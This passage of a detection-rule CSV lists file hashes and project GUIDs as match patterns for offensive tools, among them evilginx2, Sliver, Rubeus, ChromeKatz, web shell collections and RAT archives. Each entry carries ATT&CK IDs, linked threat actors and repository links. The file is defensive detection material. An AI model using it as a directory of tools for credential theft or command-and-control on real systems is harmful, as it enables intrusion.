COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28035" "*652c0669b041362a1ece950a33752cca4940146934d651c04f992b8f11b0fba0*",".{0,1000}652c0669b041362a1ece950a33752cca4940146934d651c04f992b8f11b0fba0.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","28036" "*6536EBEC-014E-4D6B-97BE-223137694CA8*",".{0,1000}6536EBEC\-014E\-4D6B\-97BE\-223137694CA8.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","28037" "*6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936*",".{0,1000}6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28038" "*654685d39d4c33cb74a990013bdf18883d774c609a155a6461bd76e93167792c*",".{0,1000}654685d39d4c33cb74a990013bdf18883d774c609a155a6461bd76e93167792c.{0,1000}","offensive_tool_keyword","rotateproxy","A 
tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28039" "*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1","10","10","N/A","N/A","N/A","N/A","28040" "*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","28041" "*65514a7171c001cd3bcc99f90efca058fe8b22ba896194eb60ea2249fbce66ee*",".{0,1000}65514a7171c001cd3bcc99f90efca058fe8b22ba896194eb60ea2249fbce66ee.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - 
T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","28042" "*6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395*",".{0,1000}6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28043" "*655d3c2fe42a6d9d46250419d7cd3205efa86f18eb71f9e6285b652ab2fefbde*",".{0,1000}655d3c2fe42a6d9d46250419d7cd3205efa86f18eb71f9e6285b652ab2fefbde.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28044" "*6563686f2048656c6c6f204261636b646f6f72*",".{0,1000}6563686f2048656c6c6f204261636b646f6f72.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","28045" 
"*656761faa342911d398af21edaf085f978ffa53a6bf3919763dfa82aba2301f1*",".{0,1000}656761faa342911d398af21edaf085f978ffa53a6bf3919763dfa82aba2301f1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","28047" "*65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632*",".{0,1000}65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28048" "*6569a4f09ccdf814bf1697e7e35975c065909df9184eb49822a34f7a029d20da*",".{0,1000}6569a4f09ccdf814bf1697e7e35975c065909df9184eb49822a34f7a029d20da.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","28049" "*65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1*",".{0,1000}65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28052" "*6581e5fa0774f61a2d4ebdb019b69fbb1ede68bc6038260e787a0cdddc09ff84*",".{0,1000}6581e5fa0774f61a2d4ebdb019b69fbb1ede68bc6038260e787a0cdddc09ff84.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28054" "*658318b022bfa0408ef73d5a1333cdfc5fec5295a0aaa75c81b54f46b5d87ad8*",".{0,1000}658318b022bfa0408ef73d5a1333cdfc5fec5295a0aaa75c81b54f46b5d87ad8.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","28055" "*6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9*",".{0,1000}6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28056" "*65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474*",".{0,1000}65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28057" "*65876ca1dde6923447642de1dbcc198b7f5bbe53c26d7eae7f1d675cb5f68774*",".{0,1000}65876ca1dde6923447642de1dbcc198b7f5bbe53c26d7eae7f1d675cb5f68774.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28058" 
"*6588c43e708dddb11349064d65b892ca0dcd746afac891fdab84ebd1b699f86d*",".{0,1000}6588c43e708dddb11349064d65b892ca0dcd746afac891fdab84ebd1b699f86d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28059" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","#GUIDproject","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","28060" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","#GUIDproject","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","28061" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#GUIDproject","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","28062" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28063" "*659e8eac2bd33a73a5562f8af3abee9ce6dcd747abe0d52ecf63f252ca79b2b2*",".{0,1000}659e8eac2bd33a73a5562f8af3abee9ce6dcd747abe0d52ecf63f252ca79b2b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28065" "*65a3e8e51550a616e1804c6dc4002ffb4a70bb7d38edaf50bc582a7f80a41345*",".{0,1000}65a3e8e51550a616e1804c6dc4002ffb4a70bb7d38edaf50bc582a7f80a41345.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28067" "*65adc037481a4fea2f113daaa322d5970c4136a81ccc21921c3ff6fb82e3aad3*",".{0,1000}65adc037481a4fea2f113daaa322d5970c4136a81ccc21921c3ff6fb82e3aad3.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28068" "*65b60edaca65b2e91c9c8b1006efd29087b58b96adeda130787e77801ccf6682*",".{0,1000}65b60edaca65b2e91c9c8b1006efd29087b58b96adeda130787e77801ccf6682.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28071" "*65b73f44795c9d8a7ac35a5d730787d72c2ceaa15ff0a8788038bee7b56edf48*",".{0,1000}65b73f44795c9d8a7ac35a5d730787d72c2ceaa15ff0a8788038bee7b56edf48.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - 
T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","28072" "*65cf10c4827342b6b8a8f2d5d094e300e41d4a3924efb8865e633d6be7fac3e6*",".{0,1000}65cf10c4827342b6b8a8f2d5d094e300e41d4a3924efb8865e633d6be7fac3e6.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28073" "*65cf6179c85728317f11460314779b365ba77199352a2b11624729f788daf6bc*",".{0,1000}65cf6179c85728317f11460314779b365ba77199352a2b11624729f788daf6bc.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#filehash","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","28074" "*65d2c2559bab3590761c7d856d14bcccf2bcc3f2f25ac6ff0d3e1a62de49540b*",".{0,1000}65d2c2559bab3590761c7d856d14bcccf2bcc3f2f25ac6ff0d3e1a62de49540b.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","28075" "*65d40e2b26a32fa02e585c939c5c59e97d0d11629197b0826f837b402f8e9b50*",".{0,1000}65d40e2b26a32fa02e585c939c5c59e97d0d11629197b0826f837b402f8e9b50.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration 
proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28076" "*65d48351ff1feb4d9577b9a8e395ab5c00804d38cf28f10b2386a57047cce489*",".{0,1000}65d48351ff1feb4d9577b9a8e395ab5c00804d38cf28f10b2386a57047cce489.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28077" "*65d4c633bf347ed4766dbb6e003776a017ccb632d73c6138c3e880a94c114c2d*",".{0,1000}65d4c633bf347ed4766dbb6e003776a017ccb632d73c6138c3e880a94c114c2d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28078" "*65d4d3773e423e48fa467c5765c8ca4ea298ae71e0a0bedd387fdd3ab2989870*",".{0,1000}65d4d3773e423e48fa467c5765c8ca4ea298ae71e0a0bedd387fdd3ab2989870.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28079" "*65d963e0cd748cc7599afd69a0f961742b17cb46d67414ce8e9cccc087b59342*",".{0,1000}65d963e0cd748cc7599afd69a0f961742b17cb46d67414ce8e9cccc087b59342.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28080" "*65dd5aa4e6cc05a7bd84be96d769806dfbe19c8c0451c13445100597fe4698d0*",".{0,1000}65dd5aa4e6cc05a7bd84be96d769806dfbe19c8c0451c13445100597fe4698d0.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","28081" "*65ddc082f73224383dfe8d9662a428b281c42ea1be7f11f7da241d672dd56a0b*",".{0,1000}65ddc082f73224383dfe8d9662a428b281c42ea1be7f11f7da241d672dd56a0b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28082" "*65dfba472014bb6e61d6f287452dcc099edabf4ba09cb196a27507298077fa75*",".{0,1000}65dfba472014bb6e61d6f287452dcc099edabf4ba09cb196a27507298077fa75.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","28083" "*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* 
- PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28084" "*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28085" "*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28086" "*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28087" "*65E26974FA14B95E42DE9662308EAC9042E06DD5FDC0987BC1D73FEF2ED2F4FD*",".{0,1000}65E26974FA14B95E42DE9662308EAC9042E06DD5FDC0987BC1D73FEF2ED2F4FD.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working 
with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28088" "*65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b*",".{0,1000}65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","28089" "*65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd*",".{0,1000}65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28090" 
